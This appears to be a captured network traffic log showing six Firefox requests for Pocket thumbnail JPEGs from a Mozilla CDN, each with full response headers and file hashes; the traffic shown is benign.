Expires: Thu, 07 Jul 2022 01:09:27 GMT
Date: Wed, 06 Jul 2022 23:50:41 GMT
Connection: keep-alive

                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F922dd00d-fd62-44d8-aed0-44e2f9cf82d4.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
                                        
server: nginx
content-length: 10272
x-amzn-requestid: 8351e692-985b-4891-b827-77b52d9fa1ad
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: Utc5yGQnIAMFYLw=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-62c20ea4-58e49c525fba7a4d71ae9aed;Sampled=0
x-amzn-remapped-date: Sun, 03 Jul 2022 21:48:20 GMT
x-amz-cf-pop: SEA73-P1
x-cache: Miss from cloudfront
x-amz-cf-id: sDaxe8WDrbE53siAcd90FUbOcpLIL2YLybRGhZa-Nx_x2msBCP72yw==
via: 1.1 d1151317ba32afe0e6370fd69fed222e.cloudfront.net (CloudFront), 1.1 cd858042f70b416ca05e042acf3908a4.cloudfront.net (CloudFront), 1.1 google
date: Wed, 06 Jul 2022 22:00:31 GMT
age: 6610
etag: "e514dd2ba6506dbfa0393dacd64630699e739697"
content-type: image/jpeg
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   10272
Md5:    eddc9e66ac69496089132a17abcb74ac
Sha1:   e514dd2ba6506dbfa0393dacd64630699e739697
Sha256: ea84cd380943f8b4f74dccea600b23701bbf46b0ab1b512065b6b4cf0b4eab05
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F13136825-0301-44c6-8c81-faf21628fe4c.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
                                        
server: nginx
content-length: 6737
x-amzn-requestid: 9a9c33df-daa2-49fb-ba8e-fd5a3149828e
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: UeP9ZG93oAMFX6A=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-62bbf9ef-248528170cf451be2662dbef;Sampled=0
x-amzn-remapped-date: Wed, 29 Jun 2022 07:06:23 GMT
x-amz-cf-pop: SEA73-P1
x-cache: Hit from cloudfront
x-amz-cf-id: GZWZ5vCdHbLeGN4FdZbd8ysfjqcGd-7MsBW_steUpJ38jyLd16JNtw==
via: 1.1 4c48e9fb20d53d40e9fe273dbdae1098.cloudfront.net (CloudFront), 1.1 28390a4d24ed4fdccd685d99cd06cf4e.cloudfront.net (CloudFront), 1.1 google
date: Wed, 06 Jul 2022 06:45:43 GMT
age: 61498
etag: "5e2f835320ab350cdd1c3ad1ceb71db2bb27b84f"
content-type: image/jpeg
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   6737
Md5:    44f59062cacc44be268845c493de29de
Sha1:   5e2f835320ab350cdd1c3ad1ceb71db2bb27b84f
Sha256: c37305dfa7a241e526c7246a6eb71360dbfa2fe5d7f369f37ef7ddbfe1b97749
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fd1f48beb-da86-42f3-b5da-39fa82b568cb.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
                                        
server: nginx
content-length: 7249
x-amzn-requestid: 865b5a9b-a852-4a12-8722-a9924f7390f6
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: UhikQFDeoAMFRMg=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-62bd4ae7-373db7491a65d6700061bc8b;Sampled=0
x-amzn-remapped-date: Thu, 30 Jun 2022 07:04:07 GMT
x-amz-cf-pop: SEA73-P1
x-cache: Hit from cloudfront
x-amz-cf-id: cG4rrc0FSLhmmqX7gfFNGDK4l_mL9KjUlyTg1MHHYHepJLjDyjg2Tw==
via: 1.1 86b676273517904f44af31586adb06ae.cloudfront.net (CloudFront), 1.1 cd858042f70b416ca05e042acf3908a4.cloudfront.net (CloudFront), 1.1 google
date: Wed, 06 Jul 2022 06:39:20 GMT
age: 61881
etag: "2f79d1e28bb827f7fa60b6675dba8022c28a1a3d"
content-type: image/jpeg
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   7249
Md5:    5c958b0c904620aff5f5f8a74f80d9f9
Sha1:   2f79d1e28bb827f7fa60b6675dba8022c28a1a3d
Sha256: 8bba608d028bbb678f021eaca3364856f930069f44b647346e649eca4c383955
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fce2fc71a-842c-433d-8506-e191aa0edcd6.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
                                        
server: nginx
content-length: 4243
x-amzn-requestid: 013a931d-b718-49de-a8e0-83dab66aa8b1
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: Ugb38Ge7oAMFaRw=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-62bcd9cc-375eb507376be9e156ed766e;Sampled=0
x-amzn-remapped-date: Wed, 29 Jun 2022 23:01:32 GMT
x-amz-cf-pop: SEA73-P1
x-cache: Hit from cloudfront
x-amz-cf-id: Z70oJQvoLMemVFsEoYEtvA5wA3jBZqBpFKMiAOABmXkQ8avGPVRESQ==
via: 1.1 030fe0607711293dda988e571617a9f2.cloudfront.net (CloudFront), 1.1 9c675215120a4ade8754c4357ef2f3ea.cloudfront.net (CloudFront), 1.1 google
date: Wed, 06 Jul 2022 16:49:27 GMT
age: 25274
etag: "5f4a7a2dcc9ffbb5bb61859a6337ec9c8f11f1f3"
content-type: image/jpeg
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   4243
Md5:    4dadb5bd9157f2899ea250117bf6655e
Sha1:   5f4a7a2dcc9ffbb5bb61859a6337ec9c8f11f1f3
Sha256: 236f94db1ce5926743b6f0692509ab20c17fca595b5c062133a9d24fc80d6f0d
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fd91e1318-19c1-478d-9499-3baab13b925b.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
                                        
server: nginx
content-length: 6764
x-amzn-requestid: 066475d9-bed3-4626-9a4d-a9e713866195
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: U3UCmEwgIAMFSDw=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-62c60076-694099bd5429b3a91e282d27;Sampled=0
x-amzn-remapped-date: Wed, 06 Jul 2022 21:36:54 GMT
x-amz-cf-pop: HIO50-C1, SEA73-P1
x-cache: Hit from cloudfront
x-amz-cf-id: 8Ie_zy0LfZGwhWeD3rj2aXI9WVNbOzQr4ixU7QvFid2bFdI2aXdYyw==
via: 1.1 23206a1c229d8877bdd053c4b05f9d12.cloudfront.net (CloudFront), 1.1 35575576af8067e30cfb17c6b9fde8e2.cloudfront.net (CloudFront), 1.1 google
date: Wed, 06 Jul 2022 22:03:40 GMT
age: 6421
etag: "245427c92c74e85f199f9fd9563c91cb62cba979"
content-type: image/jpeg
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   6764
Md5:    92e0cfdf03ce76aa5a899b42fc763e83
Sha1:   245427c92c74e85f199f9fd9563c91cb62cba979
Sha256: 2216f105d3350eabd7422e964bbbd9758009675ace79437c368097a27bf1f1fb
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Faa89fb6c-1b8f-4b5f-881a-7c1b4ddc61b9.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
                                        
server: nginx
content-length: 4829
x-amzn-requestid: 9345b8b6-c799-4398-86f8-618eec6f54d0
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: UjGL9F4oIAMFZQg=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-62bdea4c-0699926943cefd29234495fa;Sampled=0
x-amzn-remapped-date: Thu, 30 Jun 2022 18:24:12 GMT
x-amz-cf-pop: SEA73-P1
x-cache: Hit from cloudfront
x-amz-cf-id: SMiaJuChqVtH1akE4ReBrQQQS5Ic3HWrxL6FolBADdFQPakWPK9-zw==
via: 1.1 f13aef0c4b52f6f681401f232d03eb68.cloudfront.net (CloudFront), 1.1 32d624dbeb2a8b7f24dbe49007e37c90.cloudfront.net (CloudFront), 1.1 google
date: Wed, 06 Jul 2022 04:41:09 GMT
age: 68972
etag: "b639fd1617311bd45a8615efc46b043526add4aa"
content-type: image/jpeg
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   4829
Md5:    08b23daa51c5aa9893d433505300ef81
Sha1:   b639fd1617311bd45a8615efc46b043526add4aa
Sha256: 861c1f7c52fd5c5d2b8d0ae86ee2e3d46df0e9552ed2657f8aa6114703320779